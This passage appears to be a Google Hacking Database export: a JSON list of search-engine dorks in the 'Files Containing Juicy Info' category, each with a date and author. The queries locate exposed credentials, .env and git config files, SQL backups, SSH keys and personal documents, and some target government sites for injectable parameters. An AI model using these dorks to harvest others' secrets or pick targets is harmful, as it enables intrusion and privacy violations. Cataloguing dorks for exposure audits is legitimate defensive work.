{"dork": "inurl:/wp-content/plugins/elementor/", "description": "# Google Dork: inurl:/wp-content/plugins/elementor/\r\n# Files Containing Juicy Info\r\n# Date:20/10/2021\r\n# Exploit Author: samarth dad"}, {"dork": "inurl:/wp-content/plugins/wp-filebase/", "description": "# Google Dork: inurl:/wp-content/plugins/wp-filebase/\r\n# Files Containing Juicy Info\r\n# Date:20/10/2021\r\n# Exploit Author: samarth dad"}, {"dork": "inurl:\"app.yaml\" intext:\"runtime: \" ext:yaml", "description": "# Google Dork: inurl:\"app.yaml\" intext:\"runtime: \" ext:yaml\r\n# Files Containing Juicy Info\r\n# Date:22/10/2021\r\n# Exploit Author: Cristi Vlad"}, {"dork": "inurl: https://app.zerocopter.com/rd/", "description": "# Google Dork: inurl: https://app.zerocopter.com/rd/\r\n# Files Containing Juicy Info\r\n# Date:23/10/2021\r\n# Exploit Author: Akash Patil"}, {"dork": "intitle:index.of conf.mysql", "description": "# Google Dork: intitle:index.of conf.mysql\r\n# Files Containing Juicy Info\r\n# Date:23/10/2021\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "intext:\"password\" intitle:\"index of\"", "description": "# Google Dork: intext:\"password\" intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date:23/10/2021\r\n# Exploit Author: Morsheduzzaman Arman"}, {"dork": "inurl:\"robots\" | \"robot\" intext:\"admin\" AND \"Disallow\" ext:txt", "description": "# Google Dork: inurl:\"robots\" | \"robot\" intext:\"admin\" AND \"Disallow\" ext:txt\r\n# Files Containing Juicy Info\r\n# Date:25/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" \"mongod*\"", "description": "# Google Dork: intitle:\"index of\" \"mongod*\"\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Tanvir Rayhan"}, {"dork": "intitle:index.of wp.login", "description": "# Google Dork: intitle:index.of wp.login\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "inurl:/wp-content/plugins/simple-forum/admin/", "description": "# Google Dork: inurl:/wp-content/plugins/simple-forum/admin/\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Na\u00efm Gallouj"}, {"dork": "intitle:index.of /Snowflake /robots.txt", "description": "# Google Dork: intitle:index.of /Snowflake /robots.txt\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Nayan Chandra"}, {"dork": "intitle:\"index of\" \".env.example\"", "description": "# Google Dork: intitle:\"index of\" \".env.example\"\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:index of cv site:.com", "description": "# Google Dork: intitle:index of cv site:.com\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "intext:swagger filetype:log", "description": "# Google Dork: intext:swagger filetype:log\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Matheus Bolela"}, {"dork": "intitle:\"index of\" \"server.properties\"", "description": "# Google Dork: intitle:\"index of\" \"server.properties\"\r\n# Files Containing Juicy Info\r\n# Date:26/10/2021\r\n# Exploit Author: Tanvir Rayhan"}, {"dork": "Index of /apidoc/api-web/target/classes/", "description": "# Google Dork: Index of /apidoc/api-web/target/classes/\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: Faisal Habib"}, {"dork": "intitle:\"password reset\"", "description": "# Google Dork: intitle:\"password reset\"\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "intitle:index.of /CMS /robots.txt", "description": "# Google Dork: intitle:index.of /CMS /robots.txt\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:\"index of\" \"server.log\"", "description": "# Google Dork: intitle:\"index of\" \"server.log\"\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:\"index of\" \"/backup/sql\"", "description": "# Google Dork: intitle:\"index of\" \"/backup/sql\"\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: reza abasi"}, {"dork": "site:pastebin.com intext:license key | expiration", "description": "# Google Dork: site:pastebin.com intext:license key | expiration\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "site:pastebin.com intext:username | password | secret_key | token", "description": "# Google Dork: site:pastebin.com intext:username | password | secret_key | token\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "intitle:index.of /email /robots.txt", "description": "# Google Dork: intitle:index.of /email /robots.txt\r\n# Files Containing Juicy Info\r\n# Date:28/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "intitle:index.of /cftp /robots.txt", "description": "# Google Dork: # Google Dork: intitle:index.of /cftp /robots.txt\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: jawhar milkan"}, {"dork": "allinurl:index.php?page= site:.gov.in", "description": "# Google Dork: allinurl:index.php?page= site:.gov.in\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "\"inurl:php?id=\" site:.gov.bd", "description": "# Google Dork: \"inurl:php?id=\" site:.gov.bd\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "Index of /vendor/spatie/robots-txt", "description": "# Google Dork: Index of /vendor/spatie/robots-txt\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Faisal Habib"}, {"dork": "intitle:\"index of\" \".private.xml\"", "description": "# Google Dork: intitle:\"index of\" \".private.xml\"\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Chinmay Divekar"}, {"dork": "site:pastebin.com intext:\"administrator:500:\"", "description": "# Google Dork: site:pastebin.com intext:\"administrator:500:\"\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "\"inurl:php?id=\" site:.com", "description": "# Google Dork: \"inurl:php?id=\" site:.com\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: MD. Rimel"}, {"dork": "intitle:\"index of\" \".ppt\"", "description": "# Google Dork: intitle:\"index of\" \".ppt\"\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "site:github.com intext:\"unattend xmlns\" AND \"password\" ext:xml", "description": "# Google Dork: site:github.com intext:\"unattend xmlns\" AND \"password\" ext:xml\r\n# Files Containing Juicy Info\r\n# Date: 29/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" \"workspace.xml\"", "description": "# Google Dork: intitle:\"index of\" \"workspace.xml\"\r\n# Files Containing Juicy Info\r\n# Date: 29/10/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"index of\" \"-qpf\"", "description": "# Google Dork: intitle:\"index of\" \"-qpf\"\r\n# Files Containing Juicy Info\r\n# Date:30/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"-ipk\"", "description": "# Google Dork: intitle:\"index of\" \"-ipk\"\r\n# Files Containing Juicy Info\r\n# Date:30/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"Packages.gz\"", "description": "# Google Dork: intitle:\"index of\" \"Packages.gz\"\r\n# Files Containing Juicy Info\r\n# Date:30/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"mips32el-nf\"", "description": "# Google Dork: intitle:\"index of\" \"mips32el-nf\"\r\n# Files Containing Juicy Info\r\n# Date:30/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \".phpunit.xml\"", "description": "# Google Dork: intitle:\"index of\" \".phpunit.xml\"\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"index of\" \" .AndroidManifest.xml\"", "description": "# Google Dork: intitle:\"index of\" \" .AndroidManifest.xml\"\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"Index of /\" intext:\"pass.txt\"", "description": "# Google Dork: intitle:\"Index of /\" intext:\"pass.txt\"\r\n# Files Containing Juicy Info\r\n# Date:31/10/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "inurl:WS_FTP.log", "description": "# Google Dork: inurl:WS_FTP.log\r\n# Files Contaning Juicy Info\r\n# Date:31/10/2021 \r\n# Exploit Author: Suvam CyberSec"}, {"dork": "intext:\"Index of\" \"email.txt\"", "description": "# Google Dork: intext:\"Index of\" \"email.txt\"\r\n# Files Containing Juicy Info\r\n# Date:31/10/2021\r\n# Exploit Author: Parshwa Bhavsar"}, {"dork": "intitle:\"index of\" \"pptx\"", "description": "# Google Dork: intitle:\"index of\" \"pptx\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"ppt.html\"", "description": "# Google Dork: intitle:\"index of\" \"ppt.html\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"slides-ppt\"", "description": "# Google Dork: intitle:\"index of\" \"slides-ppt\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"-XML.pdf \"", "description": "# Google Dork: intitle:\"index of\" \"-XML.pdf \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"XML \"", "description": "# Google Dork: intitle:\"index of\" \"XML \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"XML.Xerces \"", "description": "# Google Dork: intitle:\"index of\" \"XML.Xerces \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"infn.it\"", "description": "# Google Dork: intitle:\"index of\" \"infn.it\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"lngs.infn.it \"", "description": "# Google Dork: intitle:\"index of\" \"lngs.infn.it \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"extra\"", "description": "# Google Dork: intitle:\"index of\" \"extra\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"extranet\"", "description": "# Google Dork: intitle:\"index of\" \"extranet\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"fsi\"", "description": "# Google Dork: intitle:\"index of\" \"fsi\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"oxid-esales\"", "description": "# Google Dork: intitle:\"index of\" \"oxid-esales\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"wp-content\"", "description": "# Google Dork: intitle:\"index of\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"css\"", "description": "# Google Dork: intitle:\"index of\" \"css\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"CD.pdf \"", "description": "# Google Dork: intitle:\"index of\" \"CD.pdf \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"DOCS-TECH \"", "description": "# Google Dork: intitle:\"index of\" \"DOCS-TECH \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" Server-Side \"", "description": "# Google Dork: intitle:\"index of\" \" Server-Side \"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" py-text\"", "description": "# Google Dork: intitle:\"index of\" \"py-text\"\r\n# Files Containing Juicy Info\r\n# Date:01/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "Google Dork", "description": "# Google Dork: intitle:\"index of\" \"-admin\"\r\n# Files Containing Juicy Info\r\n# Date:2/11/2021\r\n# Exploit Author: Tushar Jaiswal"}, {"dork": "Google Dork", "description": "# Google Dork: intitle:\"index of\" \"-pwd\"\r\n# Files Containing Juicy Info\r\n# Date:2/11/2021\r\n# Exploit Author: Tushar Jaiswal"}, {"dork": "Google Dork", "description": "# Google Dork: intitle:\"index of\" \"-.sql\"\r\n# Files Containing Juicy Info\r\n# Date:2/11/2021\r\n# Exploit Author: Tushar Jaiswal"}, {"dork": "intitle:\"index of\" \"htdocs\"", "description": "# Google Dork: intitle:\"index of\" \"htdocs\"\r\n# Files Containing Juicy Info\r\n# Date:2/11/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"index of\" \" unidecode\"", "description": "# Google Dork: intitle:\"index of\" \" unidecode\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" cldr-data\"", "description": "# Google Dork: intitle:\"index of\" \" cldr-data\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" gettext\"", "description": "# Google Dork: intitle:\"index of\" \" gettext\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" src \"", "description": "# Google Dork: intitle:\"index of\" \" src \"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" src.hint\"", "description": "# Google Dork: intitle:\"index of\" \" src.hint\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"tar.xz\"", "description": "# Google Dork: intitle:\"index of\" \"tar.xz\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"pkgs\"", "description": "# Google Dork: intitle:\"index of\" \"pkgs\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"ftp.riken", "description": "# Google Dork: intitle:\"index of\" \"ftp.riken\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"pub\"", "description": "# Google Dork: intitle:\"index of\" \"pub\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"cygwin\"", "description": "# Google Dork: intitle:\"index of\" \"cygwin\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"kde-l10n-de\"", "description": "# Google Dork: intitle:\"index of\" \"kde-l10n-de\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"txdot\"", "description": "# Google Dork: intitle:\"index of\" \"txdot\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"mirror.koddos.net\"", "description": "# Google Dork: intitle:\"index of\" \"mirror.koddos.net\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"Squid-cache\"", "description": "# Google Dork: intitle:\"index of\" \"Squid-cache\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"-login.php\"", "description": "# Google Dork: intitle:\"index of\" \"-login.php\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"metin\"", "description": "# Google Dork: intitle:\"index of\" \"metin\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"html-en\"", "description": "# Google Dork: intitle:\"index of\" \"html-en\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"html-intro\"", "description": "# Google Dork: intitle:\"index of\" \"html-intro\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"echo-linux\"", "description": "# Google Dork: intitle:\"index of\" \"echo-linux\"\r\n# Files Containing Juicy Info\r\n# Date:02/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"filelist.xml\"", "description": "# Google Dork: intitle:\"index of\" \"filelist.xml\"\r\n# Files Containing Juicy Info\r\n# Date:29/10/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"master01\"", "description": "# Google Dork: intitle:\"index of\" \"master01\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intext:\"password\" | \"passwd\" | \"pwd\" site:anonfiles.com", "description": "# Google Dork: intext:\"password\" | \"passwd\" | \"pwd\" site:anonfiles.com \r\n# Date: 04/11/2021\r\n# Files Containing Juicy Info\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "site:*.example.com inurl:(elmah.axd | errorlog.axd) ext:axd", "description": "# Google Dork: *site: .example.com inurl:(elmah.axd | errorlog.axd) ext:axd\r\n# Category: Files Containing Juicy Info\r\n# Date: 03-11-2021\r\n# Description: This dork can be used to identify public elmah instances which provides access to information about requests and responses, Session cookies, Session state, Query string and post variables, Physical path of the requested file of the application.\r\n# Author: Girish"}, {"dork": "inurl:errorlog.axd ext:axd", "description": "# Google Dork: inurl:errorlog.axd ext:axd\r\n# Category: Files Containing Juicy Info\r\n# Date: 03-11-2021\r\n# Author: Girish\r\n# Description: This dork can be used to identify public elmah instances which provides access to information about requests and responses, Session cookies, Session state, Query string and post variables, Physical path of the requested file of the application."}, {"dork": "showing putty logs", "description": "# Google Dork: filetype:log username putty\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Shubh Mishra"}, {"dork": "intitle:\"index of\" \"script.js\"", "description": "# Google Dork: intitle:\"index of\" \"script.js\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"admin-config\"", "description": "# Google Dork: intitle:\"index of\" \"admin-config\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"admin.login.php\"", "description": "# Google Dork: intitle:\"index of\" \"admin.login.php\"\r\n# Files Containing Juicy Info\r\n# Date: 03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"admin.login.php\"", "description": "# Google Dork: intitle:\"index of\" \"admin.login.php\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" wp-mail-smtp\"", "description": "# Google Dork: intitle:\"index of\" \" wp-mail-smtp\"\r\n# Files Containing Juicy Info\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"/resources\"", "description": "# Google Dork: intitle:\"index of\" \"/resources\"\r\n# Files Containing Juicy Info\r\n# Date:4/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intext:\"index of\" \"ftp\"", "description": "# Google Dork: intext:\"index of\" \"ftp\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:\"index of\" \"untitled\"", "description": "# Google Dork: intitle:\"index of\" \"untitled\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of\" \"untitled\" \"wp-content\" intext:scanned", "description": "# Google Dork: intitle:\"index of\" \"untitled\" \"wp-content\" intext:scanned\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of :\"uploads\" \"parent\" \"salary\" intext:salary", "description": "# Google Dork: index of :\"uploads\" \"parent\" \"salary\" intext:salary\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of :wp-config.zip", "description": "# Google Dork: index of :wp-config.zip\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of\" \".ssh/authorized_keys\"", "description": "# Google Dork: intitle:\"index of\" \".ssh/authorized_keys\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "Intitle:database ext:sql", "description": "# Google Dork: Intitle:database ext:sql\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"parent directory\" \"uploads\"", "description": "# Google Dork: index of: \"parent directory\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"confidential\" \"uploads\"", "description": "# Google Dork: index of: \"confidential\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"cache\" \"uploads\"", "description": "# Google Dork: index of: \"cache\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"QRcodes\" \"uploads\"", "description": "# Google Dork: index of: \"QRcodes\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"contracts\" \"uploads\"", "description": "# Google Dork: index of: \"contracts\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of : \"phonebook \"", "description": "# Google Dork: index of : \"phonebook \"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of : \"truecaller\" \"uploads\"", "description": "# Google Dork: index of : \"truecaller\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"license\" \"upload\"", "description": "# Google Dork: sindex of: \"license\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"certificate\" \"upload\"", "description": "# Google Dork: index of: \"certificate\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"certificate\" \"wp-content\"", "description": "# Google Dork: index of: \"certificate\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"application\" \"upload\"", "description": "# Google Dork: index of: \"application\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"application form\" \"upload\"", "description": "# Google Dork: index of: \"application form\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"documents\" \"wp-content\"", "description": "# Google Dork: index of: \"documents\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "intitle:\"index of\" \"_vti_inf.html\"", "description": "# Google Dork: intitle:\"index of\" \"_vti_inf.html\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"service.pwd\"", "description": "# Google Dork: intitle:\"index of\" \"service.pwd\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"shtml.dll \"", "description": "# Google Dork: intitle:\"index of\" \"shtml.dll \"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "inurl:admin ext:sql", "description": "# Google Dork: inurl:admin ext:sql\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of:\"password\" \"wp-content\"", "description": "# Google Dork: index of:\"password\" \"wp-content\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"putty\" \"uploads\"", "description": "# Google Dork: index of: \"putty\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of: \"participants\" \"uploads\"", "description": "# Google Dork: index of: \"participants\" \"uploads\"\r\n# Files Containing Juicy Info\r\n# Date: 11/05/2021 \r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "filetype:txt site:gitlab.* \"secret\" OR \"authtoken\"", "description": "# Google Dork: filetype:txt site:gitlab.* \"secret\" OR \"authtoken\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "site:gitlab.* intext:password intext:@gmail.com | @yahoo.com | @hotmail.com", "description": "# Google Dork: site:gitlab.* intext:password intext:@gmail.com | @yahoo.com | @hotmail.com\r\n# Files Containing Juicy Info\r\n# Date:5/11/2021\r\n# Exploit Author: Jorge Manuel Lozano G\u00f3mez"}, {"dork": "inurl: */.env", "description": "# Google Dork: inurl: */.env\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "intitle:\"index of\" \"/.git/config\"", "description": "# Google Dork: intitle:\"index of\" \"/.git/config\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "intitle:\"index of\" \"*/ftp.txt\"", "description": "# Google Dork: intitle:\"index of\" \"*/ftp.txt\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Vivek Pancholi"}, {"dork": "intext:\"index of\" \"user-config\"", "description": "# Google Dork: intext:\"index of\" \"user-config\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:\"database\" \"backup\" filetype:sql", "description": "# Google Dork: intitle:\"database\" \"backup\" filetype:sql\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intext:\"sitemap\" filetype:txt", "description": "# Google Dork: intext:\"sitemap\" filetype:txt\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intext:pass filetype:txt", "description": "# Google Dork: intext:pass filetype:txt\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "inurl:/package.json", "description": "# Google Dork: inurl:/package.json\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Jaydev Ahire"}, {"dork": "intitle\"index of\" \"username\" \"password\" filetype: xlsx", "description": "# Google Dork: intitle\"index of\" \"username\" \"password\" filetype: xlsx\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:\"Index of /logs/\" \"nginx\"", "description": "# Google Dork: intitle:\"Index of /logs/\" \"nginx\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: jyotiprakash Rabha"}, {"dork": "intext:\"index of\" \"home_page\"", 